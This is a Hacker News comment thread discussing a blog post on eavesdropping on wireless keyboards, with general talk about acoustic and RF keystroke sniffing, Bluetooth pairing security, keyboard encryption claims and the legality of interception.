
Eavesdropping on a wireless keyboard (2013) - trucious
http://www.windytan.com/2013/03/eavesdropping-on-wireless-keyboard.html
======
3stripe
Reminds me of an episode of Due South (the tv series about a Canadian mountie
working as a detective in Chicago) in which he correctly works out a password
from just the sound of someone typing it.

Turns out this is not so far-fetched after all:

"If you have an audio recording of somebody typing on an ordinary computer
keyboard for fifteen minutes or so, you can figure out everything they typed."

[https://freedom-to-tinker.com/blog/felten/acoustic-
snooping-...](https://freedom-to-tinker.com/blog/felten/acoustic-snooping-
typed-information/)

~~~
dominicgs
There was a great talk at Defcon in 2009 about sniffing keystrokes with
voltmeters and lasers. It's worth watching the video[1] if you're interested
in this audio technique.

The first part of their presentation uses a novel method to pick up PS/2
keystrokes from a system's ground connection. This presentation was what lead
me to design the PS/2 tap[2] to sniff keystrokes with my sound card.

[1]
[https://www.youtube.com/watch?v=9zq9DQAbWmU](https://www.youtube.com/watch?v=9zq9DQAbWmU)
[2]
[https://github.com/dominicgs/PS2_tap](https://github.com/dominicgs/PS2_tap)

------
kabdib
The problem is that the company who's saying "Trust us, we have 128 bit
encryption in our product" isn't giving you enough information to make an
informed decision about how secure the device really is.

Choosing a keyboard because the box says "128 bit encryption" doesn't help if
the manufacturer bakes in the same key on every device. Or a predictable key.
Or really, any static session key even if it varies by device serial number or
something like that. And a marketing or advertising guy doesn't know this,
they just see a checkbox they can stick on the artwork. "Just get that 128 bit
stuff in there so we aren't lying" is the most likely scenario for something
like a keyboard, where competition is tough and margins are wafer thin.

Personally I'd use copper if I was at all worried, because the likelihood of
some random firmware engineer getting a security protocol right is pretty
slim.

------
dan_bk
> Some time ago, I needed to find a new wireless keyboard. With the level of
> digital paranoia that I have, my main priority was security.

If _my main priority was security_ , then I would never even think about
wireless (network, keyboard, etc.).

~~~
dnautics
do you think a wired keyboard might emit tappable rf? Should users take care
to not have coils in their wires? Do solenoided keyboards (with the flexy
chord coils) also pose a transmission risk?

~~~
kpreid
The cable is the _least_ likely part to be the source of the problem. The data
lines are inside a shield, and in USB they are balanced (“D+” and “D-”). Both
of these act to prevent radiation of the signals.

If a keyboard radiates it is likely to be either from the unshielded,
unbalanced matrix wires going to the keyswitches, or leakage from the
controller going onto the _outside_ of the shield. (I think the latter could
be reduced by using (more/bigger) decoupling capacitors, i.e. shorting out the
RF.)

Coiling a wire does not generally make it a more effective antenna; it may or
may not make it _less_ effective depending on the circumstances. (The reason
some antennas are coiled is to get the same length of conductor into a smaller
space.)

------
csmattryder
So how far can you go and still eavesdrop on the signal? I haven't the first
clue regarding signals, but I guess you'd have to plant a bug on the underside
of the desk as opposed to a radar dish on the other side of the wall?

But yeah, another post from windytan that's left me amazed. If you're
uninitiated, this is the same woman that figured out how to read from bus
timetable display radio signals [1].

I'll stick to my USB wired keyboard for now, though, until encrypted wireless
keyboards come down from £70-100.

[1]: [http://www.windytan.com/2013/11/decoding-radio-controlled-
bu...](http://www.windytan.com/2013/11/decoding-radio-controlled-bus-
stop.html)

~~~
chmars
… or get a wireless keyboard with Bluetooth – it should be safe _enough_.

~~~
sp332
If you get an Ubertooth
[http://ubertooth.sourceforge.net/](http://ubertooth.sourceforge.net/) you can
sniff bluetooth as well. If you use the default PIN (0000 or 1234) then it's
possible to decrypt the signal. Here's an overview of how feasible decryption
is: [http://css.csail.mit.edu/6.858/2012/projects/echai-
bendorff-...](http://css.csail.mit.edu/6.858/2012/projects/echai-bendorff-
cathywu.pdf)

Also, Bluetooth LE provides no eavesdropping protection. If an attacker can
capture the pairing frames, they may be able to determine the "long-term key".
Here's the NIST guidance paper on Bluetooth security:
[http://www.nist.gov/customcf/get_pdf.cfm?pub_id=911133](http://www.nist.gov/customcf/get_pdf.cfm?pub_id=911133)

The attack surface can be minimized if the keyboard manufacturer implements
crypto properly, requires encryption at the protocol level, uses a long and
complex PIN, etc. The manufacturer with the best reputation right now is
Microsoft. They got burned pretty hard when their propriety wireless
encryption was hacked back in 2007, and it looks like their bluetooth
keyboards are doing everything right.

~~~
dominicgs
> Also, Bluetooth LE provides no eavesdropping protection. If an attacker can
> capture the pairing frames, they may be able to determine the "long-term
> key"

There's a practical attack for that, and it's quick. It also uses
Ubertooth[1].

For all Bluetooth keyboards that I've seen in the past ~5 years the pairing
process uses one of the "Secure Simple Pairing" modes. none of these have been
broken, although "Just Works" is probably vulnerable. The keyboard that I've
see use the "enter a 6 digit number" mode, which is not susceptible to man in
the middle attacks that have been used against Bluetooth keyboards before[2].

Disclosure: I work on the Ubertooth and related projects.

[1] [https://www.usenix.org/conference/woot13/workshop-
program/pr...](https://www.usenix.org/conference/woot13/workshop-
program/presentation/ryan)

[2]
[https://www.youtube.com/watch?v=X0RUN6SB6c8](https://www.youtube.com/watch?v=X0RUN6SB6c8)

~~~
sp332
I haven't seen many keyboards that seemed secure, but now that you mention it,
they are pretty old. Thanks for the update :)

------
higherpurpose
This is why Apple's iBeacon was _never_ going to be a viable method of
payment, unlike NFC. The range on Bluetooth is just too long to safely do
something like payments with it.

~~~
drdaeman
The range of Internet is incomparably greater, but we still somehow manage to
perform payments over that in a reasonably secure manner.

We just have to establish the secure channel and securely authenticate peers
to each other. The medium over which this is made is mostly irrelevant.

------
aoxfordca
If you don't have consent, this would be one of the RARE instances of a Title
I violation under the ECPA.

